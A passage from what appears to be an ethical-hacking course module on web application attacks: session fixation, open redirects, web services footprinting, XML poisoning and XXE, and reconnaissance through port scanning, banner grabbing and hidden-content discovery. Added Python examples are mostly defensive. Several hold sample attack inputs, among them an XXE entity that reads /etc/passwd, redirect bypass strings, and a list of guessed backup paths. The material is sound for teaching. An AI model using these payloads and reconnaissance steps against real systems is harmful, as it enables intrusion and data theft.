An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes. A session ID placed in the URL, as in the slide's example, is written to proxy and server logs and leaks in the Referer header of every outbound link:

    .../sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico

Timeout Exploitation

If an application's timeouts are not set properly and a user simply closes the browser without logging out from a site accessed through a public computer, an attacker can use the same browser later and exploit the user's privileges.

Password Exploitation

An attacker gains access to the web application's password database. If user passwords are not encrypted or hashed, the attacker can exploit every user's password.
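The session fixation attack described earlier and the session-ID-in-URL and timeout problems above are all failures of one component, the server-side session store. The following Python is an added example, not code from the original module or from EC-Council: a small in-memory store that shows the fixable login (it authenticates into whatever ID the request carried, so the attacker's fixed ID 4321 becomes the victim's session) beside a login that discards the presented ID and issues a fresh one, enforces an idle timeout, and never creates a session from an unknown ID; a helper flags session IDs carried in URLs. The timeout value, the parameter names it looks for, and the juggyshop.com URL in the usage are assumptions; the juggybank.com link is the one from the session fixation slide.

```python
import secrets
import time
from urllib.parse import parse_qs, urlsplit

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumed policy: 15 minutes without a request ends the session


class SessionStore:
    """Server-side session table keyed by an unguessable id. The clock is injectable so tests can advance time."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}          # session id -> {"user": str | None, "last_seen": float}

    def _new_id(self):
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG

    def lookup(self, session_id):
        """Return the session for a presented id, or None if unknown or idle too long. Never creates one."""
        session = self._sessions.get(session_id)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[session_id]      # the public-terminal case: a stale session cannot be reused
            return None
        session["last_seen"] = self._clock()
        return session

    def login_fixable(self, presented_id, user):
        """The vulnerable pattern: authenticate into whatever id the request carried, creating it if needed."""
        session = self._sessions.setdefault(presented_id, {"user": None, "last_seen": self._clock()})
        session["user"] = user
        return presented_id

    def login(self, presented_id, user):
        """The fix: discard the pre-login id (possibly chosen by an attacker) and issue a fresh one."""
        self._sessions.pop(presented_id, None)
        new_id = self._new_id()
        self._sessions[new_id] = {"user": user, "last_seen": self._clock()}
        return new_id

    def logout(self, session_id):
        self._sessions.pop(session_id, None)


def session_id_in_url(url):
    """Return a session id carried in the URL (query parameter or ;jsessionid= path parameter), else None."""
    parts = urlsplit(url)
    for key, values in parse_qs(parts.query).items():
        if key.lower() in ("sessionid", "jsessionid", "sid", "phpsessid"):
            return values[0]
    lowered = parts.path.lower()
    marker = ";jsessionid="
    position = lowered.find(marker)
    if position >= 0:
        return parts.path[position + len(marker):].split(";", 1)[0]
    return None


if __name__ == "__main__":
    store = SessionStore()
    print("fixable login keeps attacker's id:", store.login_fixable("4321", "victim"))
    print("fixed login issues a new id:     ", store.login("4321", "victim"))
    print("id leaked in URL:", session_id_in_url("http://juggybank.com/login.jsp?sessionid=4321"))
```

Rotating the ID at login is the complete fix for fixation; rejecting IDs in URLs and only accepting them from a cookie removes the leak through Referer and logs; the idle timeout bounds what an abandoned browser is worth.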
Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.

An attacker crafts a link to an unvalidated redirect and lures the victim into clicking it. When the victim clicks the link, believing it leads to a valid site, the application redirects the victim to another site. Such redirects lead to installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass, leading to:

- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution

Unvalidated Redirect: the attacker sends the user an email containing a link on the trusted site whose redirect parameter has been rewritten to point at the attacker's malicious server. The user clicks the link and is redirected to the attacker's server.

Unvalidated Forward: the attacker requests a page from the server with a forward parameter, http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp, and is forwarded to the administration page (Create price list, Create item listing, Purchase records, Registered users).

FIGURE: Unvalidated Redirects and Forwards
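Validating a redirect target is harder than it looks, because browsers and URL parsers disagree about several shapes of input. The following Python is an added example, not code from the original module or from EC-Council: a redirect check that accepts a site-relative path or an allow-listed host and rejects the usual bypasses (protocol-relative //evil.com, a look-alike subdomain, credentials in the authority, javascript: and malformed schemes, backslashes), together with a forward check that only selects from a fixed set of page names so ?fwd=admin.jsp cannot work. The site base, the allowed hosts, and the allowed forward pages are assumptions.

```python
from urllib.parse import urljoin, urlsplit

# Assumed site configuration (not from the original page).
SITE_BASE = "https://www.juggyshop.com/"
ALLOWED_HOSTS = {"www.juggyshop.com", "juggyshop.com"}
ALLOWED_FORWARDS = {"purchase.jsp", "cart.jsp", "account.jsp"}   # server-side pages a forward may name


def is_safe_redirect(target):
    """Accept only a site-relative path or an absolute http(s) URL whose host is allow-listed."""
    if not target or any(ord(ch) < 0x20 for ch in target):
        return False                       # empty, or control characters (header injection / parser confusion)
    if "\\" in target:
        return False                       # browsers treat "\" as "/", so "/\evil.com" becomes "//evil.com"
    parts = urlsplit(target)
    if parts.scheme:
        if parts.scheme not in ("http", "https") or not parts.netloc:
            return False                   # javascript:/data:, or "http:///evil.com" / "https:evil.com"
    if parts.netloc:
        if parts.username is not None or parts.password is not None:
            return False                   # "http://www.juggyshop.com@evil.com/"
        return (parts.hostname or "").lower() in ALLOWED_HOSTS
    return parts.path.startswith("/")      # "//evil.com" has a netloc and never reaches here


def resolve_redirect(target, fallback="/"):
    """Return the absolute URL to send in Location, or the fallback when the target is not safe."""
    return urljoin(SITE_BASE, target) if is_safe_redirect(target) else fallback


def is_safe_forward(page):
    """A forward parameter may only select from fixed server-side pages, never admin.jsp or a path."""
    return page in ALLOWED_FORWARDS


if __name__ == "__main__":
    for target in ("/account/orders", "//evil.com/", "https://www.juggyshop.com.evil.com/",
                   "http://www.juggyshop.com@evil.com/", "javascript:alert(1)"):
        print(f"{target!r:45} -> {resolve_redirect(target)}")
    print("fwd=admin.jsp allowed:", is_safe_forward("admin.jsp"))
```

A bare relative name such as "orders" is rejected too; in exchange for that small inconvenience the check never has to reason about what the browser will do with an ambiguous string. The forward check avoids the problem entirely by never treating the parameter as a path.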
Web Services Architecture

FIGURE 13.29: Web Services Architecture. The layered stack shown on the slide, from top to bottom:

- WS Work Processes
- WS-Security, WS-Policy, WS-SecurityPolicy, WS-Federation, WS-Trust, WS-SecureConversation
- XML Encryption, XML Digital Signatures
- Security Token Profiles: SAML, Kerberos, X.509
- XML, SOAP, WSDL, Schema, WS-Addressing, etc.
- HTTP, .NET TCP Channel, Fast InfoSet, etc.
Web Services Attack

The evolution of web services and their increasing use in business offer new attack vectors in an application framework. Web services are process-to-process communications that have special security issues and needs. Web services are based on XML protocols such as Web Services Description Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services, and all of these are exposed to the same web application threats.

Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers alike to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is handed to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:

- An attacker injects a malicious script into a web service and is able to disclose and modify application data.
- An attacker using a web service for ordering products injects a script that resets the quantity and status on the confirmation page to less than what was originally ordered. The system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products is being shipped. The attacker winds up receiving more of the product than he or she pays for.
Web Services Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel. The slide shows the XML query sent to a public UDDI registry and the XML response it returns; both are reproduced in the figure below.
Attackers use the Universal Business Registry (UBR) as a major source for gathering information about web services. It is useful to businesses and individuals alike: a public registry that runs on the UDDI specifications and SOAP, somewhat similar to a whois server in function. To register web services on a UDDI server, businesses or organizations use the following structures:

- businessEntity
- businessService
- bindingTemplate
- Technical Model (tModel)

Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.
XML Query (a find_business inquiry sent to the Microsoft UDDI registry):

    POST /inquire HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: ""
    Cache-Control: no-cache
    Pragma: no-cache
    User-Agent: Java/1.4.2_04
    Host: uddi.microsoft.com
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 229

    <?xml version="1.0" encoding="UTF-8"?>
    <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
      <Body>
        <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2">
          <name>amazon</name>
        </find_business>
      </Body>
    </Envelope>

XML Response:

    HTTP/1.1 100 Continue
    HTTP/1.1 200 OK
    Date: Tue, 28 Sep ...:07:42 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: ...
    Cache-Control: private, max-age=0
    Content-Type: text/xml; charset=utf-8
    Content-Length: 1272

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
          <serviceInfos>
            <serviceInfo serviceKey="..." businessKey="..."><name xml:lang="en-us">...</name></serviceInfo>
            (further serviceInfo entries; the keys and names are not legible in the source)
          </serviceInfos>
        </serviceList>
      </soap:Body>
    </soap:Envelope>

Note that the response headers alone identify the registry's web server (Microsoft-IIS/6.0) and framework (ASP.NET), which is the banner information server identification relies on later in this module.

FIGURE: Web Services Footprinting Attack
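The exchange on the slide is easy to reproduce and to parse, and doing so is how a tester enumerates every service a business has registered. The following Python is an added example, not code from the original module or from EC-Council: it builds the UDDI v2 find_business envelope shown above, wraps it in the raw POST, and extracts serviceKey, businessKey and name from a serviceList response. The response it parses is constructed in the shape of the slide's reply; its keys and service names are placeholders, and sending the request over the network is left to the caller.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UDDI_NS = "urn:uddi-org:api_v2"


def find_business_request(name, max_rows=50):
    """Build the UDDI v2 find_business inquiry the slide sends, as UTF-8 bytes. The name is XML-escaped."""
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Envelope xmlns="{SOAP_NS}"><Body>'
        f'<find_business generic="2.0" maxRows="{int(max_rows)}" xmlns="{UDDI_NS}">'
        f'<name>{escape(name)}</name></find_business></Body></Envelope>'
    )
    return body.encode("utf-8")


def http_post(host, body, path="/inquire"):
    """Wrap the envelope in the raw HTTP POST shown on the slide (sending it is left to the caller)."""
    head = (
        f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
        "Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"\"\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode("ascii") + body


def parse_find_business(request_bytes):
    """What the registry reads out of the inquiry: the queried name and the maxRows limit."""
    root = ET.fromstring(request_bytes)
    query = root.find(f".//{{{UDDI_NS}}}find_business")
    return {"name": query.findtext(f"{{{UDDI_NS}}}name"), "maxRows": int(query.get("maxRows"))}


def parse_service_list(response_bytes):
    """Extract serviceKey, businessKey and name from each serviceInfo in a serviceList response."""
    root = ET.fromstring(response_bytes)
    services = []
    for info in root.iter(f"{{{UDDI_NS}}}serviceInfo"):
        services.append({
            "serviceKey": info.get("serviceKey"),
            "businessKey": info.get("businessKey"),
            "name": (info.findtext(f"{{{UDDI_NS}}}name") or "").strip(),
        })
    return services


# Constructed response in the shape of the slide's serviceList; the keys and names are placeholders.
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 <soap:Body>
  <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
   <serviceInfos>
    <serviceInfo serviceKey="00000000-0000-4000-8000-000000000001" businessKey="00000000-0000-4000-8000-0000000000a1">
     <name xml:lang="en-us">Example Product Search</name>
    </serviceInfo>
    <serviceInfo serviceKey="00000000-0000-4000-8000-000000000002" businessKey="00000000-0000-4000-8000-0000000000a1">
     <name xml:lang="en">Example Order Status</name>
    </serviceInfo>
   </serviceInfos>
  </serviceList>
 </soap:Body>
</soap:Envelope>
"""

if __name__ == "__main__":
    print(http_post("uddi.microsoft.com", find_business_request("amazon")).decode())
    for service in parse_service_list(SAMPLE_RESPONSE):
        print(service)
```

Each serviceKey returned can be fed to a get_serviceDetail inquiry to obtain the bindingTemplate entries, which carry the access points (URLs) and tModel references that describe the service interface; that is the step that turns a registry listing into a target list.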
Web Services XML Poisoning

Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning, in order to generate errors in the XML parsing logic and break the execution logic. Attackers can also manipulate XML external entity references, which can lead to arbitrary file access or TCP connections being opened and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and to compromise confidential information.

XML Request:

    <CustomerRecord>
      <CustomerNumber>2010</CustomerNumber>
      <FirstName>Jason</FirstName>
      <LastName>Springfield</LastName>
      <Address>Apt 20, 3rd Street</Address>
      <Email>jason@springfield.com</Email>
      <PhoneNumber></PhoneNumber>
    </CustomerRecord>

Poisoned XML Request (the CustomerNumber and FirstName nodes are injected a second time):

    <CustomerRecord>
      <CustomerNumber>2010</CustomerNumber>
      <FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
      <FirstName>Jason</FirstName>
      <LastName>Springfield</LastName>
      <Address>Apt 20, 3rd Street</Address>
      <Email>jason@springfield.com</Email>
      <PhoneNumber></PhoneNumber>
    </CustomerRecord>

XML poisoning is similar to a SQL injection attack and has a high success rate in web services frameworks. Because web services are invoked with XML documents, the traffic that flows between the server and client applications can be poisoned. Attackers craft malicious XML documents to disrupt the parsing mechanisms, such as SAX and DOM, used on the server. Node manipulation, as in the poisoned request above, relies on different components reading different copies of a duplicated element; schema poisoning attacks the definition the parser validates against; external entity references make the parser fetch local files or remote resources on the attacker's behalf.
FIGURE: Web Services XML Poisoning (the request and poisoned request listed above)
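The poisoned request on the slide works only if the receiving code tolerates duplicate nodes, so the practical defence is a strict parser. The following Python is an added example, not code from the original module or from EC-Council: two lenient handlers that read the slide's record and silently disagree about the duplicated CustomerNumber, beside a strict handler that refuses DTD and entity declarations (the external entity case the text warns about) and requires exactly the expected children, once each, in order. In the poisoned sample the injected CustomerNumber is changed to 2011 so the disagreement is visible; the phone number and the XXE payload are constructed.

```python
import xml.etree.ElementTree as ET

EXPECTED_CHILDREN = ["CustomerNumber", "FirstName", "LastName", "Address", "Email", "PhoneNumber"]

# The slide's request (the phone number is constructed where the slide is blank).
CLEAN_REQUEST = b"""<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>555-0100</PhoneNumber>
</CustomerRecord>"""

# Node manipulation as on the slide, with the injected values changed (constructed) so that the
# two lenient handlers below visibly disagree about whose record this is.
POISONED_REQUEST = b"""<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2011</CustomerNumber>
<FirstName>Mallory</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>555-0100</PhoneNumber>
</CustomerRecord>"""

# External entity reference of the kind the text warns about (constructed).
XXE_REQUEST = b"""<!DOCTYPE CustomerRecord [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<CustomerRecord><CustomerNumber>&xxe;</CustomerNumber></CustomerRecord>"""


def parse_first_wins(xml_bytes):
    """Lenient handler A: findtext() returns the first matching child and ignores duplicates."""
    root = ET.fromstring(xml_bytes)
    return {tag: root.findtext(tag) for tag in EXPECTED_CHILDREN}


def parse_last_wins(xml_bytes):
    """Lenient handler B: a dict built by iterating the children keeps the last duplicate."""
    root = ET.fromstring(xml_bytes)
    return {child.tag: child.text for child in root}


def parse_strict(xml_bytes):
    """Reject DTDs and any record whose children are not exactly the expected ones, once each, in order."""
    upper = xml_bytes.upper()
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        raise ValueError("DTD or entity declarations are not accepted")   # blocks XXE and entity expansion
    root = ET.fromstring(xml_bytes)
    if root.tag != "CustomerRecord":
        raise ValueError(f"unexpected root element {root.tag!r}")
    tags = [child.tag for child in root]
    if tags != EXPECTED_CHILDREN:
        raise ValueError(f"unexpected child sequence {tags}")
    for child in root:
        if len(child) or child.attrib:
            raise ValueError(f"{child.tag} must be a plain text element")
    return {child.tag: (child.text or "").strip() for child in root}


if __name__ == "__main__":
    print("handler A sees customer", parse_first_wins(POISONED_REQUEST)["CustomerNumber"])
    print("handler B sees customer", parse_last_wins(POISONED_REQUEST)["CustomerNumber"])
    for sample in (POISONED_REQUEST, XXE_REQUEST):
        try:
            parse_strict(sample)
        except ValueError as error:
            print("strict handler rejected it:", error)
```

The DOCTYPE check is deliberately a byte search before parsing rather than a parser option, so it fails closed even if the parser library or its defaults change; a legitimate document that merely contains the string in character data is rejected too, which is the safe direction. Where a schema exists, validating against it with duplicates and unknown elements disallowed achieves the same as the hand-written sequence check.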
Module Flow

So far, we have discussed web application components and the various threats associated with web applications. Now we will discuss the web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it. The module's sections are: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, and Web App Pen Testing. This section gives a detailed explanation of the web application hacking methodology.

Web App Hacking Methodology

In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.
Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery

Discover the physical servers that host the web application.

Service Discovery

Discover the services running on the web servers that can be exploited as attack paths for web application hacking. Service discovery automatically searches the targeted application environment for hosts and the services they expose.

Server Identification

Grab server banners to identify the make and version of the web server software. The banner is typically the Server response header (for example Server: Microsoft-IIS/6.0) and, where present, headers such as X-Powered-By: ASP.NET that name the application framework, as seen in the UDDI response earlier in this module.

Hidden Content Discovery

Extract content and functionality that is not directly linked or reachable from the main visible content.
Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet. To footprint a web infrastructure, first you need to discover the active servers. Three techniques, namely Whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

Whois lookup gathers information about a domain with the help of DNS and WHOIS queries, typically producing an HTML report. It gives information about the IP address of the web server and its DNS names. Some Whois lookup tools are:

- http://www.tamos.com
- http://www.whois.net
- http://netcraft.com
- http://www.dnsstuff.com

DNS Interrogation

DNS is a distributed database used by organizations to map their IP addresses to hostnames and vice versa. When the DNS is improperly configured, it is easy to query it for the information needed to launch an attack on the target organization. DNS interrogation provides information about the location and type of servers. Some tools are:

- http://www.dnsstuff.com
- http://network-tools.com
- http://e-dns.org
- http://www.domaintools.com

Port Scanning

Port scanning is the process of probing a system's ports to recognize the open ones. If an attacker finds an open port that nobody intended to expose, he or she can intrude into the system by exploiting the service behind it. Port scanning attempts to connect to a particular set of TCP or UDP ports to find out which services exist on the server. Some tools are:

- Nmap
- WhatsUp PortScanner Tool
- NetScan Tools Pro
- Hping
Footprint Web Infrastructure: Service Discovery

Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. Service discovery searches a targeted application environment for hosts and services automatically. The targeted server has to be scanned thoroughly so that the common ports used by web servers for different services can be identified. The table that follows shows the list of common ports used by web servers and the respective HTTP services:

Port   Typical HTTP Services
80     World Wide Web standard port
81     Alternate WWW
88     Kerberos
443    SSL (https)
900    IBM WebSphere administration client
...    Compaq Insight Manager
2381   Compaq Insight Manager over SSL
4242   Microsoft Application Center Remote management
7001   BEA WebLogic
7002   BEA WebLogic over SSL
7070   Sun Java Web Server over SSL
8000   Alternate web server, or web cache
8001   Alternate web server or management
8005   Apache Tomcat
9090   Sun Java Web Server admin module
...    Netscape Administrator interface

TABLE: Service Discovery

You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser.

Source: http://nmap.org

Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also determine the different services running on the web server and give detailed information about the remote computers.

FIGURE: Zenmap tool screenshot (scan of google.com showing 80/tcp open http, 113/tcp closed ident, 443/tcp open https)
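The table above is most useful when read against an actual scan: the following added example (not part of the original module) parses constructed Nmap grepable (-oG) output, whose line format is documented by Nmap, and reports every open TCP port that a host is not expected to expose, annotated with the module's port table so an administrator can see which administrative interfaces are reachable. The hosts, allowlist and scan lines are constructed.

```python
"""Service exposure check over Nmap grepable (-oG) output.

Added example, not part of the original module.  It parses constructed
`nmap -oG` lines ("Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/
<owner>/<service>/<rpc>/<version>/, ...") and compares each host's open
ports against an allowlist of the ports that host is meant to expose.
Anything else, in particular the administrative ports from the module's
service discovery table, is reported so it can be firewalled or bound to a
management interface.
"""
import re
from collections import defaultdict

# Common web-server ports and the services typically behind them, taken
# from the service discovery table in this module.
TYPICAL_HTTP_SERVICES = {
    80: "World Wide Web standard port",
    81: "Alternate WWW",
    88: "Kerberos",
    443: "SSL (https)",
    900: "IBM WebSphere administration client",
    2381: "Compaq Insight Manager over SSL",
    4242: "Microsoft Application Center Remote management",
    7001: "BEA WebLogic",
    7002: "BEA WebLogic over SSL",
    7070: "Sun Java Web Server over SSL",
    8000: "Alternate web server, or web cache",
    8001: "Alternate web server or management",
    8005: "Apache Tomcat",
    9090: "Sun Java Web Server admin module",
}

# Ports a public web front end is expected to expose (constructed default).
DEFAULT_ALLOWED = frozenset({80, 443})

_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*?)(?:\t|$)")


def parse_grepable(text):
    """Return {ip: [(port, state, proto, service), ...]} from -oG output.

    Lines without a "Ports:" field (comments, "Status: Up" lines) are
    ignored rather than guessed at.
    """
    hosts = defaultdict(list)
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if not m:
            continue
        ip, _name, ports = m.groups()
        for entry in ports.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue  # malformed entry, skip
            port, state, proto, _owner, service = fields[:5]
            hosts[ip].append((int(port), state, proto, service))
    return dict(hosts)


def unexpected_exposure(hosts, allowed_by_host=None):
    """List open TCP ports that are not in the host's allowlist.

    Each finding is (ip, port, service, description); the description comes
    from the module's port table when the port is listed there.
    """
    allowed_by_host = allowed_by_host or {}
    findings = []
    for ip, entries in hosts.items():
        allowed = allowed_by_host.get(ip, DEFAULT_ALLOWED)
        for port, state, proto, service in entries:
            if state != "open" or proto != "tcp" or port in allowed:
                continue
            desc = TYPICAL_HTTP_SERVICES.get(port, "not in web-server port table")
            findings.append((ip, port, service, desc))
    return findings


# Constructed sample output (not a real scan): one host exposes only 80/443,
# the other also leaves Tomcat's port and an admin module reachable.
SAMPLE_OG = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.0.2.10 (www.example)\tStatus: Up\n"
    "Host: 192.0.2.10 (www.example)\tPorts: 80/open/tcp//http///, "
    "113/closed/tcp//ident///, 443/open/tcp//https///\tIgnored State: filtered (997)\n"
    "Host: 192.0.2.11 (app.example)\tPorts: 80/open/tcp//http///, "
    "8005/open/tcp//unknown///, 9090/open/tcp//zeus-admin///\n"
)

if __name__ == "__main__":
    for ip, port, service, desc in unexpected_exposure(parse_grepable(SAMPLE_OG)):
        print(f"{ip}: tcp/{port} ({service}) open - {desc}")
```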
Footprint Web Infrastructure: Server Identification / Banner Grabbing

Analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select exploits from vulnerability databases to attack a web server and applications.

Banner grabbing tools:
1. Telnet
2. Netcat
3. ID Serve
4. Netcraft

Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select exploits from vulnerability databases to attack a web server and applications.

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server:
Date: Thu, 07 Jul ... GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/
Via: 1.1 Application and Content Networking System Software
Connection: Close

Connection to host lost.
C:\>

(Server identified as Microsoft IIS)

A banner can be grabbed with the help of tools such as Telnet, Netcat, ID Serve, and Netcraft. These tools make banner grabbing and analysis an easy task.

FIGURE: Server Identification / Banner Grabbing
Footprint Web Infrastructure: Hidden Content Discovery

Crucial information related to the business, such as prices of products, discounts, login IDs, and passwords, is kept secret. This information is usually not visible to outsiders and is usually stored in hidden form fields.

Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc.

These hidden fields can be determined with the help of three techniques. They are:

Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover hidden content by means of web spidering include:
- OWASP Zed Attack Proxy
- Burp Spider
- WebScarab

Attacker-Directed Spidering

An attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy, can also be used for attacker-directed spidering.

Brute Forcing

Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
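Seen from the server side, both spidering and name-guessing leave a distinctive trace in the access log. The following added example (not part of the original module) parses constructed combined-format log lines and raises one alert per client for forced browsing (a high share of 404 responses in a short window) and one for spidering (many distinct paths in a short window); the thresholds and the log lines are constructed and would be tuned per site.

```python
"""Detect hidden-content brute forcing and aggressive spidering in web
server access logs.

Added example, not from the original module.  Parses constructed
Apache/nginx combined-format lines and flags, per client IP and sliding
time window:
  * forced browsing: many requests of which a large share return 404
    (guessing backup, configuration or admin paths that do not exist), and
  * spidering: a burst of requests over many distinct paths.
Thresholds are constructed defaults.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"].split("?", 1)[0],  # ignore the query string
        "status": int(m["status"]),
    }


def detect(lines, window_s=60, min_requests=20, notfound_ratio=0.5,
           spider_paths=15):
    """Return (ip, kind, detail) alerts, at most one per ip and kind."""
    per_ip = defaultdict(deque)   # ip -> recent (ts, path, status) events
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = per_ip[rec["ip"]]
        q.append((rec["ts"], rec["path"], rec["status"]))
        while (rec["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()               # drop events older than the window
        if len(q) < min_requests:
            continue
        nf = sum(1 for _, _, s in q if s == 404)
        key = (rec["ip"], "forced-browsing")
        if nf / len(q) >= notfound_ratio and key not in alerted:
            alerted.add(key)
            alerts.append((*key, f"{nf}/{len(q)} requests returned 404 in {window_s}s"))
        distinct = len({p for _, p, _ in q})
        key = (rec["ip"], "spidering")
        if distinct >= spider_paths and key not in alerted:
            alerted.add(key)
            alerts.append((*key, f"{distinct} distinct paths in {window_s}s"))
    return alerts


def _sample_lines():
    """Constructed log: one client guessing backup/config names (mostly 404),
    one crawling real pages quickly, and one ordinary visitor."""
    guesses = ["/backup.zip", "/config.php.bak", "/admin/", "/web.config.old",
               "/db.sql", "/test.php", "/old/", "/login.bak", "/site.tar.gz",
               "/phpinfo.php", "/include.inc", "/logs/"]
    lines = []
    for i in range(24):
        path = guesses[i % len(guesses)]
        status = 200 if path == "/admin/" else 404
        lines.append(f'198.51.100.7 - - [10/Oct/2012:13:55:{i:02d} +0000] '
                     f'"GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')
    for i in range(20):
        lines.append(f'203.0.113.9 - - [10/Oct/2012:13:56:{i:02d} +0000] '
                     f'"GET /products/{i} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"')
    lines.append('192.0.2.5 - - [10/Oct/2012:13:57:00 +0000] '
                 '"GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    return lines


SAMPLE_ALERTS = detect(_sample_lines())

if __name__ == "__main__":
    for ip, kind, detail in SAMPLE_ALERTS:
        print(f"{ip}: {kind}: {detail}")
```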
Web Spidering Using Burp Suite

http://www.portswigger.net

Source: http://www.portswigger.net

Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Web spidering using Burp Suite is done in the following manner:

